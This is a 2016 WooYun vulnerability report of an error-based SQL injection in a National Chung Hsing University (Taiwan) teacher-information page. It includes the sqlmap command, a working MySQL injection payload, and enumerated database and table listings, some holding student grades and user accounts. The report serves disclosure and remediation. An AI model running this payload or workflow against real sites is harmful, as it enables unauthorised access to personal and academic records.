当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0185106

漏洞标题:國立中興大學某处存在报错注入漏洞(涉及14库)(臺灣地區)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2016-03-16 08:52

修复时间:2016-03-18 03:33

公开时间:2016-03-18 03:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-16: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如题

详细说明:

target:

http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343


error:

error.png


payload:

$ python sqlmap.py -u "http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343" --random-agent --dbms=mysql --technique=E


sqlmap:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Uid (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: Uid=24343' AND (SELECT 6939 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (ELT(6939=6939,1))),0x716b626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WdzW'='WdzW
---
[21:22:33] [INFO] testing MySQL
[21:22:33] [INFO] confirming MySQL
[21:22:33] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL >= 5.0.0

漏洞证明:

databases:

available databases [14]:
[*] aacsb
[*] ccair
[*] cmeip
[*] cmeip_new
[*] com_ic
[*] cssm
[*] cssm_en
[*] cssm_en_new
[*] cssm_ip
[*] cssm_new
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


tables:

Database: cmeip_new
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| stu_grade | 18170 |
| class_stu | 3406 |
| history | 1406 |
| others | 1372 |
| core_ability_score | 1304 |
| `user` | 1190 |
| userdata | 1190 |
| prjournals | 1140 |
| prproceedings | 1105 |
| apmproceedings | 1104 |
| international | 480 |
| conference | 326 |
| credit | 263 |
| others1 | 209 |
| research | 117 |
| textbooks | 101 |
| edu | 96 |
| exp | 96 |
| books | 90 |
| teacherdata | 79 |
| functions | 78 |
| mono | 72 |
| photo | 63 |
| class_teacher | 43 |
| exam | 33 |
| purview | 27 |
| prpresentations | 26 |
| patent | 16 |
| chapters | 11 |
| modules | 11 |
| semester | 11 |
| staffnum | 11 |
| com_class | 9 |
| core_ability | 8 |
| announce | 7 |
| core_ability_group | 4 |
| facworkshop | 3 |
| nprjournals | 3 |
| seminar | 3 |
| soresearch | 3 |
| `group` | 1 |
| news | 1 |
| online | 1 |
+--------------------+---------+
Database: ccair
+------------------+---------+
| Table | Entries |
+------------------+---------+
| sam_usertime | 346 |
| sam_userjob | 299 |
| sam_userlang | 294 |
| sam_userexpr | 244 |
| sam_syscode | 226 |
| sam_sysuser | 168 |
| sam_userplan | 143 |
| sam_compjob | 129 |
| sam_continfo | 128 |
| sam_usercert | 111 |
| sam_vw_summer01 | 111 |
| sam_vw_validjob | 102 |
| tmp | 101 |
| sam_userresu | 98 |
| sam_userbiog | 96 |
| sam_vw_applyinfo | 86 |
| sam_userinfo | 80 |
| sam_sysgrant | 68 |
| sam_vw_jobcnt | 68 |
| sam_sysnum | 63 |
| sam_compinfo | 57 |
| sam_tracinfo | 40 |
| sam_sysmenu | 35 |
| sam_vw_compwait | 8 |
| sam_sysparams | 6 |
| sam_pracinfo | 3 |
| sam_vw_pracjobs | 3 |
+------------------+---------+
Database: cssm
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| grs_tw_stats | 1072494 |
| grs_eng_stats | 197256 |
| grs_tw_keywords | 36817 |
| grs_tw_admin_log | 13436 |
| grs_eng_admin_log | 2177 |
| grs_tw_album_gallery | 1295 |
| grs_eng_keywords | 785 |
| grs_tw_business_file | 461 |
| grs_tw_business | 343 |
| grs_tw_article | 324 |
| grs_tw_periodical_file | 176 |
| grs_tw_teaching | 150 |
| grs_tw_periodical | 84 |
| grs_eng_album_gallery | 82 |
| grs_tw_law_file | 82 |
| grs_tw_faculty | 78 |
| grs_eng_faculty | 77 |
| grs_tw_form | 71 |
| grs_eng_shop_config | 67 |
| grs_tw_flash_play | 67 |
| grs_tw_shop_config | 67 |
| grs_eng_cssm_config | 57 |
| grs_tw_cssm_config | 57 |
| grs_eng_article | 53 |
| grs_tw_album | 49 |
| grs_tw_law | 48 |
| grs_tw_friend_link | 45 |
| grs_tw_communicate | 40 |
| grs_tw_program | 40 |
| grs_eng_flash_play | 35 |
| grs_admin_action | 33 |
| grs_tw_building | 29 |
| grs_eng_program | 28 |
| grs_tw_course | 25 |
| grs_tw_member | 24 |
| grs_eng_friend_link | 21 |
| grs_eng_business_file | 18 |
| grs_eng_member | 15 |
| grs_tw_business_cat | 14 |
| grs_eng_college | 13 |
| grs_eng_business_cat | 11 |
| grs_tw_college | 11 |
| grs_tw_form_cat | 9 |
| grs_eng_periodical_file | 8 |
| grs_eng_program_cat | 8 |
| grs_eng_teaching | 8 |
| grs_eng_faculty_category | 7 |
| grs_tw_article_cat | 7 |
| grs_tw_faculty_category | 7 |
| grs_tw_law_cat | 7 |
| grs_eng_album | 6 |
| grs_eng_album_category | 6 |
| grs_tw_album_category | 6 |
| grs_admin_user | 5 |
| grs_eng_article_cat | 5 |
| grs_eng_communicate | 5 |
| grs_tw_building_cat | 4 |
| grs_eng_communicate_category | 3 |
| grs_eng_link_category | 3 |
| grs_tw_communicate_category | 3 |
| grs_tw_link_category | 3 |
| grs_tw_program_cat | 3 |
| grs_eng_course_category | 2 |
| grs_eng_member_category | 2 |
| grs_eng_periodical | 2 |
| grs_eng_teaching_cat | 2 |
| grs_tw_course_category | 2 |
| grs_tw_member_category | 2 |
| grs_tw_teaching_cat | 2 |
| grs_eng_building | 1 |
| grs_eng_course | 1 |
| grs_eng_form | 1 |
+------------------------------+---------+
Database: aacsb
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| sam_coursescor | 16085 |
| sam_courselist | 6727 |
| sam_courseatte | 1134 |
| sam_vw_coursescor | 208 |
| sam_coursegoal | 200 |
| sam_courseinfo | 162 |
| sam_goalrank | 156 |
| sam_sysnum | 111 |
| sam_degreegoal | 83 |
| sam_sysuser | 68 |
| sam_sysgrant | 39 |
| sam_syscode | 28 |
| sam_sysmenu | 28 |
| sam_scoreclass | 17 |
| sam_rankscore | 10 |
| sam_sysparams | 6 |
| sam_terminfo | 5 |
| sam_sysnews | 2 |
| sam_sysnewslist | 2 |
+-------------------+---------+


由以上sqlmap注入出的数据即可证明SQL注入漏洞,可泄露相关数据库信息...

修复方案:

过滤相关参数

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-18 03:33

厂商回复:

驗證時該通報頁面已404

最新状态:

暂无


漏洞评价:

评价